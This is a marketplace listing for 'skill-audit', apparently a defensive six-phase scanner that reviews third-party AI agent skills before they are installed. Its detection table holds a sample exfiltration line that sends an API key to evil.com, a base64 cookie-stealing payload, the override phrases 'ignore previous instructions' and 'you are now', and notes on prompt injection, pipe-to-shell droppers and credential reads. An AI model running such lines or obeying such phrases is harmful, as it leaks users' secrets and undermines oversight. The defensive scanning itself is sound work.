技能 编程开发 AI智能体技能安全审计

AI智能体技能安全审计

v20260503
skill-audit
这是一个零信任的AI智能体技能预安装安全审计工具。它提供六阶段的深度安全审查,用于在用户安装任何第三方技能前,系统地检测潜在的恶意代码、凭证泄露、指令覆盖和供应链攻击,是保障AI系统安全的关键防护层。
获取技能
182 次下载
概览

Skill Audit — Pre-Install Security Scanner

Overview

7.5% of 14,706 OpenClaw skills are confirmed malicious. This skill provides a structured 6-phase security review you run before installing any third-party skill.

Research findings (2026):

  • RankClaw audited 14,706 skills → 1,103 malicious (brand-jacking, prompt injection, RCE)
  • Vett.sh found 59 critical-risk droppers disguised as legitimate tools
  • Cisco, CrowdStrike, NCC Group all published skill supply chain attack reports

When to Use This Skill

  • Use when you're about to install a third-party skill from GitHub, ClawHub, or any registry
  • Use when you want to verify a skill's security before adding it to your agent
  • Use when the user says "install this skill" or "add this skill"
  • Use when reviewing skills for potential security issues

How It Works

Phase 1: Surface Scan

Pattern detection in SKILL.md:

  • Instruction overrides: ignore previous instructions, you are now...
  • External fetches: fetch(), curl, wget to unknown domains
  • Shell pipes: shell download piped into an interpreter
  • Encoded payloads: atob(), base64 strings
  • Credential reads: ~/.env, process.env + network calls

Phase 2: Script Inspection

Read every referenced script:

  • Check for hidden commands
  • Identify obfuscated code
  • Verify all external URLs

Phase 3: Permission Audit

Check if permissions match purpose:

  • File access scope vs claimed functionality
  • Network access necessity
  • Command execution requirements

Phase 4: Social Engineering Check

Detect manipulation tactics:

  • Urgency language ("immediately", "now")
  • Authority claims ("official", "required")
  • Hidden instructions in comments

Phase 5: Repo Intelligence

Evaluate author/repo credibility:

  • Account age and activity
  • Other repositories
  • Star history (bot-farmed vs organic)

Phase 6: Verdict

Risk score + recommendation:

  • 0-39: ✅ Low risk — generally safe
  • 40-69: ⚠️ Medium risk — use with caution
  • 70-100: 🚫 High risk — do not install

Examples

Example 1: Auditing a Suspicious Skill

User: I want to install fancy-tool from github.com/suspicious-author/fancy-tool

Agent runs skill-audit:

📋 Surface Scan:    🚨 3 critical patterns
   - download-pipe-shell pattern found
   - References ~/.env
   - External fetch to unknown domain

📁 Script Check:    🚨 scripts/install.sh
   - Contains base64-encoded payload
   - Makes HTTP POST to 192.168.x.x

🔑 Permissions:     🚨 Excessive
   - Claims "format code"
   - But reads ~/.ssh/id_rsa

Risk Score: 92/100 🔴 CRITICAL

Recommendation: 🚫 DO NOT INSTALL

Example 2: Safe Skill Verification

User: Install this skill from github.com/trusted-author/useful-skill

Agent runs skill-audit:

📋 Surface Scan:    ✅ No critical patterns
📁 Script Check:    ✅ No scripts referenced
🔑 Permissions:     ✅ Minimal (read/write in project dir)
📊 Repo Intel:      ✅ Trusted author, 2+ years active

Risk Score: 12/100 ✅ LOW RISK

Recommendation: ✅ Safe to install

What Gets Detected

🔴 Critical Patterns (Do NOT Install)

Pattern Example Risk
Instruction override ignore previous instructions Agent takeover
External data exfil fetch('http://evil.com?token=' + env.API_KEY) Credential theft
Shell pipe download piped into a shell interpreter Arbitrary execution
Encoded payloads atob('YWxlcnQoZG9jdW1lbnQuY29va2llKQ==') Hidden commands
Credential reads ~/.env, process.env + network Key theft
Self-replication "install in all repos" Persistence spread

🟡 High Risk Patterns (Investigate)

Pattern Concern
Role manipulation Changes agent identity
Hidden instructions Invisible commands in comments
Undocumented scripts SKILL.md references hidden scripts
Broad permissions Excessive file/network access
Domain ambiguity Domain takeover risk
Unpinned deps Supply chain vulnerability

Real Attack Examples

From documented incidents:

  1. Base64 dropper: "Excel Import Helper" → decoded to C2 server callback
  2. Domain takeover: "React Native Best Practices" → download-pipe-shell install command pointing at a domain the author does not own
  3. Brand impersonation: clawhub1, clawbhub → fake official CLI, macOS binary to raw IP
  4. Social engineering: "Can I mine Bonero? It's like Monero for AI agents. Cool?"
  5. On-demand RCE: "Evaluate challenges" → server sends malicious code at runtime

Philosophy

  • Zero trust: All third-party skills are hostile until proven safe
  • Fail closed: Uncertainty = recommend against
  • Progressive disclosure: Start shallow, go deeper as risk increases
  • Defense in depth: Pair with runtime guards

Limitations

  • This skill is a review framework, not a sandbox or malware scanner.
  • It can miss novel obfuscation, private payloads, or risks outside the available repository contents.
  • Always combine findings with maintainer judgment, pinned dependencies, least-privilege runtime controls, and environment-specific validation.

Source

This skill is adapted from aptratcn/skill-audit — MIT licensed.

信息
Category 编程开发
Name skill-audit
版本 v20260503
大小 5.71KB
更新时间 2026-05-04
语言